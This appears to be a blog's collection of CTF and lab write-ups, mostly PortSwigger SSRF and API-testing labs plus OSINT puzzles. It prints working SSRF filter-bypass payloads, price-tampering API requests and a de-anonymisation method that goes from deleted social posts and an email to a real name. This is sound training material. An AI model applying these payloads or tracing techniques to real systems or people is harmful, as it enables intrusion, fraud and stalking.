Exploiting a mass assignment vulnerability Link: https://portswigger.net/web-security/api-testing/lab-exploiting-mass-assignment-vulnerability To solve the lab, find and exploit a mass assignment vulnerability to buy a Lightweight l33t Leather Jacket. You can log in to your own account using the following credentials: wiener:peter. solution Start the challange by logging using wiener:peter credentials I navigated through the website to find api endpoints After navigation i found it when you add item to cart, go to your cart and click place order This moves you to this API endpoint /api/checkout and this is the request body when the request method is POST { "chosen_products":[ { "product_id":"1", "quantity":1, "item_price":0 } ] } I tried to change the request method to PUT and i found in the response that only GET, POST are the allowed methods When i change the request method to GET i get this response { "chosen_discount":{ "percentage":0 }, "chosen_products":[ { "product_id":"1", "name":"Lightweight \"l33t\" Leather Jacket", "quantity":2, "item_price":133700 } ] } We note that there’s chosen_discount Let’s add it the body of the request and send the post request but after making the chosen_discount = 100 Congratzzzzzzzzzzzzzzzzzz

CTF · 2024-03-05

API testing: challange 2

Finding and exploiting an unused API endpoint Link: https://portswigger.net/web-security/api-testing/lab-exploiting-unused-api-endpoint To solve the lab, exploit a hidden API endpoint to buy a Lightweight l33t Leather Jacket. You can log in to your own account using the following credentials: wiener:peter solution Start the challange by logging using wiener:peter credentials I navigated through the website to find api endpoints After some navigation, I found that when you go to https://0ad4003703ff9a3680c8767500820061.web-security-academy.net/product?productId=1 you will visit the API endpoint /api/products/1/price After some trials i found that when i change the request method the response gives me this Allow: GET, PATCH when i try PATCH request method, i get this in the response {"type":"ClientError","code":400,"error":"Only 'application/json' Content-Type is supported"}’ So let’s add this header Content-Type: application/json and i got internal server error After trials i found that by adding {} in the body of the request i get this message in the response {"type":"ClientError","code":400,"error":"'price' parameter missing in body"} So i added the price parameter in the request body and set it to 0 like this {"price":0} Nice, when i go to my cart i find that the total price = 0 so i can purchase now Congratzzzzzzzzzzzzzz

CTF · 2024-03-05

API testing: challange 1

Exploiting an API endpoint using documentation Link: https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation To solve the lab, find the exposed API documentation and delete carlos. You can log in to your own account using the following credentials: wiener:peter solution Start the challange by logging using wiener:peter credentials I navigated through the website to find api endpoints but i didn’t find I tried to find if there’s an exposed api documentation by visiting the url https://0a3c005a033bf00881c694ba005c0041.web-security-academy.net/api/ I found this page The info we need are here we can delete the user carlos now by visiting https://0a3c005a033bf00881c694ba005c0041.web-security-academy.net/api/user/carlos and making the request DELETE Congratzzzzzzzzzzzz

CTF · 2024-03-05

OSINT: Lost In History (easy)

Description MM0X and xElessaway were in a mission to find someone but seems they had a stalker and got us this picture of them both. can you identify the place they were? Flag Format: 0xL4ugh{The Name of the place with spaces} solution Let’s go after analyzing the image i found some notes which may be important They are numbered in this img label 1: a reflection of a word label 2&3: are statues The word in label one after zooming and guessing the rest of the word i believe it’s ‘المومياوات’ The statues are indication that this may be a museum So when i searched using ‘متحف المومياوات’ i found this result The place is The national museum of Egyptian Civilization and you can confirm that by searching for photos of this museum Then the flag is 0xL4ugh{The national museum of Egyptian Civilization}

CTF · 2024-02-10

Misc: Library (hard)

CTF · 2024-02-10

Misc: GitMeow (medium)

CTF · 2024-02-10

OSINT: Cheater (medium)

Description Our team received a request from a man who believes his wife may be cheating on him. He asked us to help by checking her accounts for any evidence. He provided his wife’s name, “Hamdia Eldhkawy” and mentioned that a friend informed him she shared a picture with someone on social media. He couldn’t find the image and wants us to discover the man’s real name. Flag Format: 0xL4ugh{First Name_Last Name} Solution Let’s go First i started searching using Hamdia Eldhkawy using google after some trials i found nothing useful I decided to try searching for Hamdia Eldhkawy using bing search good news, i found an instagram profile instagram_profile I searched within the profile trying to get useful information for next steps examining followers posts I stuck for a long time here as i thought the followers or the people reacting to her posts maybe interesting, so i spent some time with some reacting users but with no useful information I also tried using the pictures in her posts in reverse image search, but also with no useful results Then i noticed important thing that all the posts are about AI generated pictures This may indicate that she is interested in AI and this gave me a hint to the next step Let’s go back to bing and search using Hamdia Eldhkawy ai and we got this results The OPENAI link is the treasure here OPENAI post When we go in we find interesting comment from a user called Hamada_Elbes I remember you, Hamada Hamade_Elbes was an OSINT challange in 0xl4ugh ctf 2023 xDDDD anyway let’s back and look at the comment The comment is: Haha Hamdia, I already caught that :wink: I can share it with your husband <3 with the photo below After analyzing this image carefully we will find important information First, The url may move us to the post Second, Hamdia mentioned her boyfriend in the post but the picture is cropped so we just know that his account starts by spide and this’s not enough When we try to access the link in the image we willn’t get that post Maybe Hamdia deleted it ummmmmmmmmmmmmm Good one, Hamdia but you are too late as Hamada_Elbes caught you xDD We need to reach that deleted post and in this situation we will think abount web archiving I tried wayback machine but with no useful results Then i searched for an alternative and after many trials this worked with me archive.ph Let’s open it and get the info we need The treasures in here finally she mentioned spidersh4zly What are you waiting for?! Let’s search for him on instagram And this is his account There’s another link in his profile for more information, and i see that there’s nothing else important Let’s go to this link We see many accounts for spidersh4zly after analyzing them i found that all are useless except the gmail We can use the gmail in getting his real name using a powerful tool called epieos Go to its site insert the email and let it makes its magic And here’s the results We found him. He is Abdelfatah ElCanaway Congratz we got it. The flag: 0xL4ugh{Abdelfatah_ElCanaway}

CTF · 2024-02-10

SSRF: challange 5

SSRF with filter bypass via open redirection Link: https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos. The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly. so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/2 Host: 0aba00cf04fc37d787d2ecab009800c8.web-security-academy.net Cookie: session=Jkj8BtT8GyJXGIIkD92AI4jVwg1i5kVt; session=xePg3AZmakzW3clhYyuezrf201WpqbH6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0aba00cf04fc37d787d2ecab009800c8.web-security-academy.net/product?productId=5 Content-Type: application/x-www-form-urlencoded Content-Length: 65 Origin: https://0aba00cf04fc37d787d2ecab009800c8.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers stockApi=%2Fproduct%2Fstock%2Fcheck%3FproductId%3D5%26storeId%3D1 we see that in the stockAPI parameter, we can’t make the server issue the request directly to a different host. but when we intercept next product request we find that there’s a path parameter so we can make use of it in stockAPI parameter ny making it = /product/nextProduct?path=http://192.168.0.12:8080/admin It redirects us to admin interface, so let’s delete carlos by making stockAPI=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos congratzzzzzzzzzzzz

CTF · 2024-02-09

SSRF: challange 4

SSRF with whitelist-based input filter Link: https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed an anti-SSRF defense you will need to bypass. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly u will get this message Admin interface only available if logged in as an administrator, or if requested from loopback so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/2 Host: 0a0d0067037080968141b6080065004b.web-security-academy.net Cookie: session=h74HgBoArcl80JrdU0IBbH5Edvr3JI69 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0a0d0067037080968141b6080065004b.web-security-academy.net/product?productId=3 Content-Type: application/x-www-form-urlencoded Content-Length: 107 Origin: https://0a0d0067037080968141b6080065004b.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D3%26storeId%3D1 notice that stockApi parameter has a url as a value, so let’s try to change it to http://localhost/admin and the send the request ummmmmmmmmmm it’s blocked and also all the trials like http://127.1 let’s try this http://localhost@stock.weliketoshop.net/ this gives “Internal Server Error” response. after appending # to localhost the url is rejected so let’s try double URL encoding the # to be %2523 then the stockApi parameter became http://localhost%2523@stock.weliketoshop.net/ and the status code of the response became 200 let’s delete carlos using http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos congratzzzzzzzzzzzzzzzzzz

CTF · 2024-02-09

SSRF: challange 3

SSRF with blacklist-based input filter Link: https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed two weak anti-SSRF defenses that you will need to bypass. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly u will get this message Admin interface only available if logged in as an administrator, or if requested from loopback so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/1.1 Host: 0a8800100385496e84c90fc700fa00af.web-security-academy.net Cookie: session=ffMtPXx2g8AmQYwWYmNulgDa0wkhrt4i User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0a8800100385496e84c90fc700fa00af.web-security-academy.net/product?productId=2 Content-Type: application/x-www-form-urlencoded Content-Length: 107 Origin: https://0a8800100385496e84c90fc700fa00af.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D2%26storeId%3D1 notice that stockApi parameter has a url as a value, so let’s try to change it to http://localhost/admin and the send the request ummmmmmmmmmm it’s blocked so let’s try this http://127.1 Nice we got response with status code 200 OK then let’s try http://127.1/admin It’s blocked so there may be restriction on admin let’s do some obsufication like double url encoding of any character like a is example the payload became http://127.1/%25%36%31dmin sent the request Nice we got response with status code 200 OK when we look at the response body we see this <div> <span>wiener - </span> <a href="/admin/delete?username=wiener">Delete</a> </div> <div> <span>carlos - </span> <a href="/admin/delete?username=carlos">Delete</a> </div> and that’s what we exactly need send the previous request again but with stockApi parameter value = http://127.1/%25%36%31dmin/delete?username=carlos Carlos is deleted Congratzzzzzzzzzzzzzzzzzzzzzzzzzzzz

CTF · 2024-02-09

SSRF: challange 2

Basic SSRF against another back-end system Link: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly. so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/1.1 Host: 0aa4001c041a5c3f81caca2000520096.web-security-academy.net Cookie: session=2Gw97cnP5g3C7q7rHceYJzb6gt78siRj User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0aa4001c041a5c3f81caca2000520096.web-security-academy.net/product?productId=1 Content-Type: application/x-www-form-urlencoded Content-Length: 96 Origin: https://0aa4001c041a5c3f81caca2000520096.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close stockApi=http%3A%2F%2F192.168.0.1%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1 notice that stockApi parameter has a url as a value, so let’s try to change it to http://192.168.0.x:8080/admin as said in describtion. we don’t know the value of x so we will send the request to the intruder for brute forcing to be like this POST /product/stock HTTP/1.1 Host: 0aa4001c041a5c3f81caca2000520096.web-security-academy.net Cookie: session=2Gw97cnP5g3C7q7rHceYJzb6gt78siRj User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0aa4001c041a5c3f81caca2000520096.web-security-academy.net/product?productId=1 Content-Type: application/x-www-form-urlencoded Content-Length: 96 Origin: https://0aa4001c041a5c3f81caca2000520096.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close stockApi=http://192.168.0.§x§:8080/admin notice that x is between two of § character, as it’s parameter of the brute force to choose the values of it we will go to payloads tab change payload type to numbers and make it ranges from 0 to 255 with step 1 start the attack and wait until you see a request with status 200 when you find it this means that this is the suitable ip back to the repeater and use it with changing the value of the stockApi to: /admin/delete?username=carlos carlos is deleted congratzzzzzzzzzzzzzzzzzzzzz

CTF · 2024-02-09

SSRF: challange 1

Basic SSRF against the local server Link: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. solution start the lab and remember the objective is to open /admin and delete the user carlos if u try going to /admin endpoint, you will n’t get the result as u can’t access it directly u will get this message Admin interface only available if logged in as an administrator, or if requested from loopback so let’s go to products and click check stock as challange describtion said intercept this request POST /product/stock HTTP/1.1 Host: 0a81005f047071e181a5de86001a00cb.web-security-academy.net Cookie: session=CMThK0h99viMGTnCHS5TWoh3xgfVOzH5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://0a81005f047071e181a5de86001a00cb.web-security-academy.net/product?productId=2 Content-Type: application/x-www-form-urlencoded Content-Length: 107 Origin: https://0a81005f047071e181a5de86001a00cb.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D2%26storeId%3D1 notice that stockApi parameter has a url as a value, so let’s try to change it to http://localhost/admin and the send the request Nice we got response with status code 200 OK when we look at the response body we see this <div> <span>wiener - </span> <a href="/admin/delete?username=wiener">Delete</a> </div> <div> <span>carlos - </span> <a href="/admin/delete?username=carlos">Delete</a> </div> and that’s what we exactly need send the previous request again but with stockApi parameter value = http://localhost/admin/delete?username=carlos Carlos is deleted Congratzzzzzzzzzzzzzzzzzzzzzzzzzzzz

CTF · 2024-02-09

0xk4k45h1

Contact

CTF